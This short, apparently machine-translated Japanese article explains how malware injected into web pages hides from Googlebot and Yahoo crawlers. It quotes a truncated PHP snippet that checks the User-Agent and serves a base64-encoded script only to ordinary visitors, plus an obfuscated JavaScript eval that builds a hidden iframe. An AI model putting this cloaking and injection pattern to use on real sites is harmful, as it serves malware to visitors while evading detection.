✍🏼 🧑🏼‍🤝‍🧑🏻 📏 悪意のあるスクリプトがgooglebotから隠すことを学ぶ 💂 🤢 💆

GoogleはHTMLページで悪意のあるコードをかなり適切に定義します。その後、キャッチされたサイトはブラックリストに入り、検索結果に表示されます。さらに悪いことに、感染はすぐにサイトの所有者に知られるようになり、検索エンジンから来たユーザーからフィードバックを受け取ります。これはすべて、ウイルス作成者ビジネスにとって非常に悪いことです。それが彼らが新しいトリックを思いついた理由です：彼らはこのようなエンコードされたコードをページに追加し始めました：

if (!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot")&& 
      

        
        
        
      

     (!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo"))) 
      

        
        
        
      

     { 
      

        
        
        
      

     return base64_decode("PHNjcmlwdD5.. ..KS5qb2luKCIiKSk7PC9zY3JpcHQ+"); 
      

        
        
        
      

     } 
      

        
        
        
      

     else 
      

        
        
        
      

     { 
      

        
        
        
      

     return ""; 
      

        
        
        
      

     }

つまり、マルウェアはGoogleまたはYahooの検索ボットがサイトを訪問したかどうかをチェックし、この場合、悪意のあるコードはページに表示されません。他の訪問者にはスクリプトが表示されます。

var bpxDsSbm8='d*%@o*%@c*%@u*%@%@a*%@.. %@t*%@p*%@:*%@/*%@/*%@n*%@i*%@n*%@o*%@"*%@ *%@w*%@i*%@d*%@t*%@h*%@=*%@2*%@.. *%@h*%@e*%@i*%@g*%@h*%@t*%@=*%@2*%@ *%@f*%@r*%@a*%@m*%@e*%@b*%@o*%@r*%@d*%.. @e*%@r*%@=*%@0*%@>*%@<*%@/*%@i*%@f*%@r;eval(bpxDsSbm8.split('*%@').join(""));

悪意のあるスクリプトがgooglebotから隠すことを学ぶ

More articles: